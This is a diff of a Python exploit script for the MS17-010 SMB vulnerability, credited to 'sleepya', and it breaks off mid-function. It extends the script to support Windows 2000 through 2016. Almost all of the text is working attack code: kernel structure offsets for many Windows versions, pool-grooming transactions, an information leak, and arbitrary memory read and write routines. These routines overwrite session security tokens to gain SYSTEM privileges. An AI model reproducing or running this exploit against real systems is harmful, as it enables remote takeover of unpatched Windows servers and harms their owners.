MS17-010 exploit for Windows 2000 and later by sleepya
|
||||
|
||||
Note:
|
||||
- The exploit should never crash a target (chance should be nearly 0%)
|
||||
|
@ -15,17 +15,46 @@ Note:
|
|||
|
||||
Tested on:
|
||||
- Windows 2016 x64
|
||||
- Windows 10 Pro Build 10240 x64
|
||||
- Windows 2012 R2 x64
|
||||
- Windows 8.1 x64
|
||||
- Windows 2008 R2 SP1 x64
|
||||
- Windows 7 SP1 x64
|
||||
- Windows 2008 SP1 x64
|
||||
- Windows 2003 R2 SP2 x64
|
||||
- Windows XP SP2 x64
|
||||
- Windows 8.1 x86
|
||||
- Windows 7 SP1 x86
|
||||
- Windows 2008 SP1 x86
|
||||
- Windows 2003 SP2 x86
|
||||
- Windows XP SP3 x86
|
||||
- Windows 2000 SP4 x86
|
||||
'''
|
||||
|
||||
USERNAME = ''
|
||||
PASSWORD = ''
|
||||
|
||||
'''
|
||||
A transaction with empty setup:
|
||||
- it is allocated from paged pool (same as other transaction types) on Windows 7 and later
|
||||
- it is allocated from private heap (RtlAllocateHeap()) with no on use it on Windows Vista and earlier
|
||||
- no lookaside or caching method for allocating it
|
||||
|
||||
Note: method name is from NSA eternalromance
|
||||
|
||||
For Windows 7 and later, it is good to use matched pair method (one is large pool and another one is fit
|
||||
for freed pool from large pool). Additionally, the exploit does the information leak to check transactions
|
||||
alignment before doing OOB write. So this exploit should never crash a target against Windows 7 and later.
|
||||
|
||||
For Windows Vista and earlier, matched pair method is impossible because we cannot allocate transaction size
|
||||
smaller than PAGE_SIZE (Windows XP can but large page pool does not split the last page of allocation). But
|
||||
a transaction with empty setup is allocated on private heap (it is created by RtlCreateHeap() on initialing server).
|
||||
Only this transaction type uses this heap. Normally, no one uses this transaction type. So transactions alignment
|
||||
in this private heap should be very easy and very reliable (fish in a barrel in NSA eternalromance). The drawback
|
||||
of this method is we cannot do information leak to verify transactions alignment before OOB write.
|
||||
So this exploit has a chance to crash target same as NSA eternalromance against Windows Vista and earlier.
|
||||
'''
|
||||
|
||||
'''
|
||||
Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
|
||||
win7 x64
|
||||
|
@ -57,23 +86,27 @@ struct SrvSecContext {
|
|||
BOOLEAN UsePsImpersonateClient; // 0x30
|
||||
}
|
||||
|
||||
SrvImpersonateSecurityContext() is used in Windows 7 and later before doing any operation as logged on user.
|
||||
SrvImpersonateSecurityContext() is used in Windows Vista and later before doing any operation as logged on user.
|
||||
It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true.
|
||||
From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL,
|
||||
PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns
|
||||
STATUS_SUCCESS when Token is NULL.
|
||||
If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM)
|
||||
to do all SMB operations.
|
||||
Note: fake Token might be possible, but NULL token is much easier.
|
||||
Note: for Windows 2003 and earlier, the exploit modify token user and groups in PCtxtHandle to get SYSTEM because only
|
||||
ImpersonateSecurityContext() is used in these Windows versions.
|
||||
'''
|
||||
WIN7_INFO = {
|
||||
###########################
|
||||
# info for modify session security context
|
||||
###########################
|
||||
WIN7_64_SESSION_INFO = {
|
||||
'SESSION_SECCTX_OFFSET': 0xa0,
|
||||
'SESSION_ISNULL_OFFSET': 0xba,
|
||||
'FAKE_SECCTX': pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
|
||||
'SECCTX_SIZE': 0x28,
|
||||
}
|
||||
|
||||
WIN7_32_INFO = {
|
||||
WIN7_32_SESSION_INFO = {
|
||||
'SESSION_SECCTX_OFFSET': 0x80,
|
||||
'SESSION_ISNULL_OFFSET': 0x96,
|
||||
'FAKE_SECCTX': pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
|
||||
|
@ -81,58 +114,192 @@ WIN7_32_INFO = {
|
|||
}
|
||||
|
||||
# win8+ info
|
||||
WIN8_INFO = {
|
||||
WIN8_64_SESSION_INFO = {
|
||||
'SESSION_SECCTX_OFFSET': 0xb0,
|
||||
'SESSION_ISNULL_OFFSET': 0xca,
|
||||
'FAKE_SECCTX': pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
|
||||
'SECCTX_SIZE': 0x38,
|
||||
}
|
||||
|
||||
WIN8_32_INFO = {
|
||||
WIN8_32_SESSION_INFO = {
|
||||
'SESSION_SECCTX_OFFSET': 0x88,
|
||||
'SESSION_ISNULL_OFFSET': 0x9e,
|
||||
'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
|
||||
'SECCTX_SIZE': 0x24,
|
||||
}
|
||||
|
||||
X86_INFO = {
|
||||
'PTR_SIZE' : 4,
|
||||
'PTR_FMT' : 'I',
|
||||
'FRAG_TAG_OFFSET' : 12,
|
||||
'POOL_ALIGN' : 8,
|
||||
'SRV_BUFHDR_SIZE' : 8,
|
||||
# win 2003 (xp 64 bit is win 2003)
|
||||
WIN2K3_64_SESSION_INFO = {
|
||||
'SESSION_ISNULL_OFFSET': 0xba,
|
||||
'SESSION_SECCTX_OFFSET': 0xa0, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
|
||||
'SECCTX_PCTXTHANDLE_OFFSET': 0x10, # PCtxtHandle is at offset 0x8 but only upperPart is needed
|
||||
'PCTXTHANDLE_TOKEN_OFFSET': 0x40,
|
||||
'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
|
||||
'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
|
||||
}
|
||||
|
||||
WIN2K3_32_SESSION_INFO = {
|
||||
'SESSION_ISNULL_OFFSET': 0x96,
|
||||
'SESSION_SECCTX_OFFSET': 0x80, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
|
||||
'SECCTX_PCTXTHANDLE_OFFSET': 0xc, # PCtxtHandle is at offset 0x8 but only upperPart is needed
|
||||
'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
|
||||
'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
|
||||
'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
|
||||
}
|
||||
|
||||
# win xp
|
||||
WINXP_32_SESSION_INFO = {
|
||||
'SESSION_ISNULL_OFFSET': 0x94,
|
||||
'SESSION_SECCTX_OFFSET': 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
|
||||
'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
|
||||
'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
|
||||
'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
|
||||
}
|
||||
|
||||
WIN2K_32_SESSION_INFO = {
|
||||
'SESSION_ISNULL_OFFSET': 0x94,
|
||||
'SESSION_SECCTX_OFFSET': 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
|
||||
'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
|
||||
'TOKEN_USER_GROUP_CNT_OFFSET': 0x3c,
|
||||
'TOKEN_USER_GROUP_ADDR_OFFSET': 0x58,
|
||||
}
|
||||
|
||||
###########################
|
||||
# info for exploitation
|
||||
###########################
|
||||
# for windows 2008+
|
||||
WIN7_32_TRANS_INFO = {
|
||||
'TRANS_SIZE' : 0xa0, # struct size
|
||||
'TRANS_FLINK_OFFSET' : 0x18,
|
||||
'TRANS_INPARAM_OFFSET' : 0x40,
|
||||
'TRANS_OUTPARAM_OFFSET' : 0x44,
|
||||
'TRANS_INDATA_OFFSET' : 0x48,
|
||||
'TRANS_OUTDATA_OFFSET' : 0x4c,
|
||||
'TRANS_PARAMCNT_OFFSET' : 0x58,
|
||||
'TRANS_TOTALPARAMCNT_OFFSET' : 0x5c,
|
||||
'TRANS_FUNCTION_OFFSET' : 0x72,
|
||||
'TRANS_MID_OFFSET' : 0x80,
|
||||
}
|
||||
|
||||
X64_INFO = {
|
||||
'PTR_SIZE' : 8,
|
||||
'PTR_FMT' : 'Q',
|
||||
'FRAG_TAG_OFFSET' : 0x14,
|
||||
'POOL_ALIGN' : 0x10,
|
||||
'SRV_BUFHDR_SIZE' : 0x10,
|
||||
WIN7_64_TRANS_INFO = {
|
||||
'TRANS_SIZE' : 0xf8, # struct size
|
||||
'TRANS_FLINK_OFFSET' : 0x28,
|
||||
'TRANS_INPARAM_OFFSET' : 0x70,
|
||||
'TRANS_OUTPARAM_OFFSET' : 0x78,
|
||||
'TRANS_INDATA_OFFSET' : 0x80,
|
||||
'TRANS_OUTDATA_OFFSET' : 0x88,
|
||||
'TRANS_PARAMCNT_OFFSET' : 0x98,
|
||||
'TRANS_TOTALPARAMCNT_OFFSET' : 0x9c,
|
||||
'TRANS_FUNCTION_OFFSET' : 0xb2,
|
||||
'TRANS_MID_OFFSET' : 0xc0,
|
||||
}
|
||||
|
||||
WIN5_32_TRANS_INFO = {
|
||||
'TRANS_SIZE' : 0x98, # struct size
|
||||
'TRANS_FLINK_OFFSET' : 0x18,
|
||||
'TRANS_INPARAM_OFFSET' : 0x3c,
|
||||
'TRANS_OUTPARAM_OFFSET' : 0x40,
|
||||
'TRANS_INDATA_OFFSET' : 0x44,
|
||||
'TRANS_OUTDATA_OFFSET' : 0x48,
|
||||
'TRANS_PARAMCNT_OFFSET' : 0x54,
|
||||
'TRANS_TOTALPARAMCNT_OFFSET' : 0x58,
|
||||
'TRANS_FUNCTION_OFFSET' : 0x6e,
|
||||
'TRANS_PID_OFFSET' : 0x78,
|
||||
'TRANS_MID_OFFSET' : 0x7c,
|
||||
}
|
||||
|
||||
WIN5_64_TRANS_INFO = {
|
||||
'TRANS_SIZE' : 0xe0, # struct size
|
||||
'TRANS_FLINK_OFFSET' : 0x28,
|
||||
'TRANS_INPARAM_OFFSET' : 0x68,
|
||||
'TRANS_OUTPARAM_OFFSET' : 0x70,
|
||||
'TRANS_INDATA_OFFSET' : 0x78,
|
||||
'TRANS_OUTDATA_OFFSET' : 0x80,
|
||||
'TRANS_PARAMCNT_OFFSET' : 0x90,
|
||||
'TRANS_TOTALPARAMCNT_OFFSET' : 0x94,
|
||||
'TRANS_FUNCTION_OFFSET' : 0xaa,
|
||||
'TRANS_PID_OFFSET' : 0xb4,
|
||||
'TRANS_MID_OFFSET' : 0xb8,
|
||||
}
|
||||
|
||||
X86_INFO = {
|
||||
'ARCH' : 'x86',
|
||||
'PTR_SIZE' : 4,
|
||||
'PTR_FMT' : 'I',
|
||||
'FRAG_TAG_OFFSET' : 12,
|
||||
'POOL_ALIGN' : 8,
|
||||
'SRV_BUFHDR_SIZE' : 8,
|
||||
}
|
||||
|
||||
X64_INFO = {
|
||||
'ARCH' : 'x64',
|
||||
'PTR_SIZE' : 8,
|
||||
'PTR_FMT' : 'Q',
|
||||
'FRAG_TAG_OFFSET' : 0x14,
|
||||
'POOL_ALIGN' : 0x10,
|
||||
'SRV_BUFHDR_SIZE' : 0x10,
|
||||
}
|
||||
|
||||
def merge_dicts(*dict_args):
|
||||
result = {}
|
||||
for dictionary in dict_args:
|
||||
result.update(dictionary)
|
||||
return result
|
||||
|
||||
OS_ARCH_INFO = {
|
||||
# for Windows Vista, 2008, 7 and 2008 R2
|
||||
'WIN7': {
|
||||
'x86': merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN7_32_SESSION_INFO),
|
||||
'x64': merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN7_64_SESSION_INFO),
|
||||
},
|
||||
# for Windows 8 and later
|
||||
'WIN8': {
|
||||
'x86': merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN8_32_SESSION_INFO),
|
||||
'x64': merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN8_64_SESSION_INFO),
|
||||
},
|
||||
'WINXP': {
|
||||
'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WINXP_32_SESSION_INFO),
|
||||
'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
|
||||
},
|
||||
'WIN2K3': {
|
||||
'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K3_32_SESSION_INFO),
|
||||
'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
|
||||
},
|
||||
'WIN2K': {
|
||||
'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K_32_SESSION_INFO),
|
||||
},
|
||||
}
|
||||
|
||||
|
||||
TRANS_NAME_LEN = 4
|
||||
HEAP_HDR_SIZE = 8 # heap chunk header size
|
||||
|
||||
|
||||
def calc_alloc_size(size, align_size):
|
||||
return (size + align_size - 1) & ~(align_size-1)
|
||||
|
||||
def wait_for_request_processed(conn):
|
||||
#time.sleep(0.05)
|
||||
# send echo is faster than sleep(0.05) when connection is very good
|
||||
conn.send_echo('a')
|
||||
|
||||
def find_named_pipe(conn):
|
||||
pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
|
||||
|
||||
tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
|
||||
found_pipe = None
|
||||
for pipe in pipes:
|
||||
try:
|
||||
fid = conn.nt_create_andx(tid, pipe)
|
||||
conn.close(tid, fid)
|
||||
found_pipe = pipe
|
||||
except smb.SessionError as e:
|
||||
pass
|
||||
|
||||
conn.disconnect_tree(tid)
|
||||
return found_pipe
|
||||
|
||||
|
||||
special_mid = 0
|
||||
extra_last_mid = 0
|
||||
def reset_extra_mid(conn):
|
||||
|
@ -145,62 +312,87 @@ def next_extra_mid():
|
|||
extra_last_mid += 1
|
||||
return extra_last_mid
|
||||
|
||||
|
||||
# Borrow 'groom' and 'bride' word from NSA tool
|
||||
# GROOM_TRANS_SIZE includes transaction name, parameters and data
|
||||
# Note: the GROOM_TRANS_SIZE size MUST be multiple of 16 to make FRAG_TAG_OFFSET valid
|
||||
GROOM_TRANS_SIZE = 0x5010
|
||||
|
||||
|
||||
def calc_alloc_size(size, align_size):
|
||||
return (size + align_size - 1) & ~(align_size-1)
|
||||
|
||||
def leak_frag_size(conn, tid, fid, info):
|
||||
def leak_frag_size(conn, tid, fid):
|
||||
# this method can be used on Windows Vista/2008 and later
|
||||
# leak "Frag" pool size and determine target architecture
|
||||
info = {}
|
||||
|
||||
# A "Frag" pool is placed after the large pool allocation if last page has some free space left.
|
||||
# A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version.
|
||||
# To make exploit more generic, exploit does info leak to find a "Frag" pool size.
|
||||
# From the leak info, we can determine the target architecture too.
|
||||
mid = conn.next_mid()
|
||||
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-4)
|
||||
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
|
||||
req2 = conn.create_nt_trans_secondary_packet(mid, data='B'*276) # leak more 276 bytes
|
||||
|
||||
conn.send_raw(req1[:-8])
|
||||
conn.send_raw(req1[-8:]+req2)
|
||||
leakData = conn.recv_transaction_data(mid, 0x10d0+276)
|
||||
leakData = leakData[0x10d4:] # skip parameters and its own input
|
||||
# Detect target architecture and calculate frag pool size
|
||||
if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
|
||||
print('Target is 32 bit')
|
||||
if info['SESSION_SECCTX_OFFSET'] == WIN7_INFO['SESSION_SECCTX_OFFSET']:
|
||||
info.update(WIN7_32_INFO)
|
||||
elif info['SESSION_SECCTX_OFFSET'] == WIN8_INFO['SESSION_SECCTX_OFFSET']:
|
||||
info.update(WIN8_32_INFO)
|
||||
else:
|
||||
print('The exploit does not support this 32 bit target')
|
||||
sys.exit()
|
||||
info.update(X86_INFO)
|
||||
info['arch'] = 'x86'
|
||||
info['FRAG_POOL_SIZE'] = ord(leakData[ X86_INFO['FRAG_TAG_OFFSET']-2 ]) * X86_INFO['POOL_ALIGN']
|
||||
elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
|
||||
print('Target is 64 bit')
|
||||
info.update(X64_INFO)
|
||||
info['arch'] = 'x64'
|
||||
info['FRAG_POOL_SIZE'] = ord(leakData[ X64_INFO['FRAG_TAG_OFFSET']-2 ]) * X64_INFO['POOL_ALIGN']
|
||||
else:
|
||||
print('Not found Frag pool tag in leak data')
|
||||
sys.exit()
|
||||
|
||||
# Calculate frag pool size
|
||||
info['FRAG_POOL_SIZE'] = ord(leakData[ info['FRAG_TAG_OFFSET']-2 ]) * info['POOL_ALIGN']
|
||||
print('Got frag size: 0x{:x}'.format(info['FRAG_POOL_SIZE']))
|
||||
return info
|
||||
|
||||
# groom: srv buffer header
|
||||
info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
|
||||
print('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
|
||||
# groom paramters and data is alignment by 8 because it is NT_TRANS
|
||||
info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - 4 - 4 - info['TRANS_SIZE'] # empty transaction name (4), alignment (4)
|
||||
|
||||
# bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
|
||||
bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
|
||||
info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
|
||||
print('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
|
||||
# bride paramters and data is alignment by 4 because it is TRANS
|
||||
info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - 4 - info['TRANS_SIZE'] # empty transaction name (4)
|
||||
def read_data(conn, info, read_addr, read_size):
|
||||
fmt = info['PTR_FMT']
|
||||
# modify trans2.OutParameter to leak next transaction and trans2.OutData to leak real data
|
||||
# modify trans2.*ParameterCount and trans2.*DataCount to limit data
|
||||
new_data = pack('<'+fmt*3, info['trans2_addr']+info['TRANS_FLINK_OFFSET'], info['trans2_addr']+0x200, read_addr) # OutParameter, InData, OutData
|
||||
new_data += pack('<II', 0, 0) # SetupCount, MaxSetupCount
|
||||
new_data += pack('<III', 8, 8, 8) # ParamterCount, TotalParamterCount, MaxParameterCount
|
||||
new_data += pack('<III', read_size, read_size, read_size) # DataCount, TotalDataCount, MaxDataCount
|
||||
new_data += pack('<HH', 0, 5) # Category, Function (NT_RENAME)
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])
|
||||
|
||||
# create one more transaction before leaking data
|
||||
# - next transaction can be used for arbitrary read/write after the current trans2 is done
|
||||
# - next transaction address is from TransactionListEntry.Flink value
|
||||
conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=0x4300-0x20, totalParameterCount=0x1000)
|
||||
|
||||
return info['FRAG_POOL_SIZE']
|
||||
# finish the trans2 to leak
|
||||
conn.send_nt_trans_secondary(mid=info['trans2_mid'])
|
||||
read_data = conn.recv_transaction_data(info['trans2_mid'], 8+read_size)
|
||||
|
||||
# set new trans2 address
|
||||
info['trans2_addr'] = unpack_from('<'+fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']
|
||||
|
||||
# set trans1.InData to &trans2
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<'+fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
# modify trans2 mid
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
return read_data[8:] # no need to return parameter
|
||||
|
||||
def write_data(conn, info, write_addr, write_data):
|
||||
# trans2.InData
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<'+info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
# write data
|
||||
conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
|
||||
def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
|
||||
|
@ -210,10 +402,12 @@ def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
|
|||
conn.send_nt_trans(5, param=trans_param, totalDataCount=0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0)
|
||||
|
||||
mid_ntrename = conn.next_mid()
|
||||
# first GROOM, for leaking next BRIDE transaction
|
||||
req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A'*0x10d0, maxParameterCount=info['GROOM_DATA_SIZE']-0x10d0)
|
||||
req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B'*276) # leak more 276 bytes
|
||||
|
||||
# second GROOM, for controlling next BRIDE transaction
|
||||
req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE']-0x1000, maxParameterCount=0x1000)
|
||||
# many BRIDEs, expect two of them are allocated at splitted pool from GROOM
|
||||
reqs = []
|
||||
for i in range(12):
|
||||
mid = next_extra_mid()
|
||||
|
@ -278,86 +472,41 @@ def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
|
|||
'session': session_addr,
|
||||
'next_page_addr': next_page_addr,
|
||||
'trans1_mid': leak_mid,
|
||||
'trans1_addr': inparam_value - info['TRANS_SIZE'] - 4,
|
||||
'trans1_addr': inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN,
|
||||
'trans2_addr': flink_value - info['TRANS_FLINK_OFFSET'],
|
||||
'special_mid': special_mid,
|
||||
}
|
||||
|
||||
def read_data(conn, info, read_addr, read_size):
|
||||
fmt = info['PTR_FMT']
|
||||
# modify trans2.OutParameter to leak next transaction and trans2.OutData to leak real data
|
||||
# modify trans2.*ParameterCount and trans2.*DataCount to limit data
|
||||
new_data = pack('<'+fmt*3, info['trans2_addr']+info['TRANS_FLINK_OFFSET'], info['trans2_addr']+0x200, read_addr) # OutParameter, InData, OutData
|
||||
new_data += pack('<II', 0, 0) # SetupCount, MaxSetupCount
|
||||
new_data += pack('<III', 8, 8, 8) # ParamterCount, TotalParamterCount, MaxParameterCount
|
||||
new_data += pack('<III', read_size, read_size, read_size) # DataCount, TotalDataCount, MaxDataCount
|
||||
new_data += pack('<HH', 0, 5) # Category, Function (NT_RENAME)
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])
|
||||
def exploit_matched_pairs(conn, pipe_name, info):
|
||||
# for Windows 7/2008 R2 and later
|
||||
|
||||
# create one more transaction before leaking data
|
||||
# - next transaction can be used for arbitrary read/write after the current trans2 is done
|
||||
# - next transaction address is from TransactionListEntry.Flink value
|
||||
conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=0x4300-0x20, totalParameterCount=0x1000)
|
||||
|
||||
# finish the trans2 to leak
|
||||
conn.send_nt_trans_secondary(mid=info['trans2_mid'])
|
||||
read_data = conn.recv_transaction_data(info['trans2_mid'], 8+read_size)
|
||||
tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
|
||||
conn.set_default_tid(tid)
|
||||
# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
|
||||
fid = conn.nt_create_andx(tid, pipe_name)
|
||||
|
||||
# set new trans2 address
|
||||
info['trans2_addr'] = unpack_from('<'+fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']
|
||||
info.update(leak_frag_size(conn, tid, fid))
|
||||
# add os and arch specific exploit info
|
||||
info.update(OS_ARCH_INFO[info['os']][info['arch']])
|
||||
|
||||
# set trans1.InData to &trans2
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<'+fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
# groom: srv buffer header
|
||||
info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
|
||||
print('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
|
||||
# groom paramters and data is alignment by 8 because it is NT_TRANS
|
||||
info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - info['TRANS_SIZE'] # alignment (4)
|
||||
|
||||
# modify trans2 mid
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
# bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
|
||||
bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
|
||||
info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
|
||||
print('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
|
||||
# bride paramters and data is alignment by 4 because it is TRANS
|
||||
info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - info['TRANS_SIZE']
|
||||
|
||||
return read_data[8:] # no need to return parameter
|
||||
|
||||
|
||||
def write_data(conn, info, write_addr, write_data):
|
||||
# trans2.InData
|
||||
conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<'+info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
# write data
|
||||
conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
|
||||
def exploit(target, pipe_name):
|
||||
conn = MYSMB(target)
|
||||
|
||||
# set NODELAY to make exploit much faster
|
||||
conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
|
||||
|
||||
info = {}
|
||||
|
||||
conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
|
||||
server_os = conn.get_server_os()
|
||||
print('Target OS: '+server_os)
|
||||
if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
|
||||
info.update(WIN7_INFO)
|
||||
elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 "):
|
||||
info.update(WIN8_INFO)
|
||||
else:
|
||||
print('This exploit does not support this target')
|
||||
sys.exit()
|
||||
|
||||
# ================================
|
||||
# try align pagedpool and leak info until satisfy
|
||||
# ================================
|
||||
leakInfo = None
|
||||
# max attempt: 10
|
||||
for i in range(10):
|
||||
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
|
||||
conn.set_default_tid(tid)
|
||||
# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
|
||||
fid = conn.nt_create_andx(tid, pipe_name)
|
||||
if 'FRAG_POOL_SIZE' not in info:
|
||||
leak_frag_size(conn, tid, fid, info)
|
||||
reset_extra_mid(conn)
|
||||
leakInfo = align_transaction_and_leak(conn, tid, fid, info)
|
||||
if leakInfo is not None:
|
||||
|
@ -365,6 +514,11 @@ def exploit(target, pipe_name):
|
|||
print('leak failed... try again')
|
||||
conn.close(tid, fid)
|
||||
conn.disconnect_tree(tid)
|
||||
|
||||
tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
|
||||
conn.set_default_tid(tid)
|
||||
fid = conn.nt_create_andx(tid, pipe_name)
|
||||
|
||||
if leakInfo is None:
|
||||
return False
|
||||
|
||||
|
@ -372,7 +526,7 @@ def exploit(target, pipe_name):
|
|||
info.update(leakInfo)
|
||||
|
||||
# ================================
|
||||
# shift trans1.Indata ptr with SmbWriteAndX
|
||||
# shift transGroom.Indata ptr with SmbWriteAndX
|
||||
# ================================
|
||||
shift_indata_byte = 0x200
|
||||
conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)
|
||||
|
@ -392,7 +546,7 @@ def exploit(target, pipe_name):
|
|||
print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
|
||||
print('!!! Write to wrong place !!!')
|
||||
print('the target might be crashed')
|
||||
sys.exit()
|
||||
return False
|
||||
|
||||
print('success controlling groom transaction')
|
||||
|
||||
|
@ -405,26 +559,284 @@ def exploit(target, pipe_name):
|
|||
# ================================
|
||||
print('modify trans1 struct for arbitrary read/write')
|
||||
fmt = info['PTR_FMT']
|
||||
# modify trans_special.InData to &trans1
|
||||
# use transGroom to modify trans2.InData to &trans1. so we can modify trans1 with trans2 data
|
||||
conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
|
||||
wait_for_request_processed(conn)
|
||||
|
||||
# modify
|
||||
# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself
|
||||
